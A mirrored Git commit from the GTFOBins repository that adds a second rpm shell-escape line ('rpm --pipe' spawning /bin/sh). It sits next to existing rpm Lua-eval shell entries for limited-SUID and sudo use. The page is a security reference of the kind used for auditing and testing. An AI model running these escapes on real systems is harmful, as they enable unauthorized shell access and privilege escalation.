mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-08-23 17:44:49 +02:00
Add alternative shell for rpm
This commit is contained in:
@@ -2,6 +2,7 @@
|
|||||||
functions:
|
functions:
|
||||||
shell:
|
shell:
|
||||||
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
|
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||||
|
- code: rpm --pipe '/bin/sh 0<&1'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
- code: ./rpm --eval '%{lua:os.execute("/bin/sh")}'
|
- code: ./rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||||
sudo:
|
sudo:
|
||||||
|
Reference in New Issue
Block a user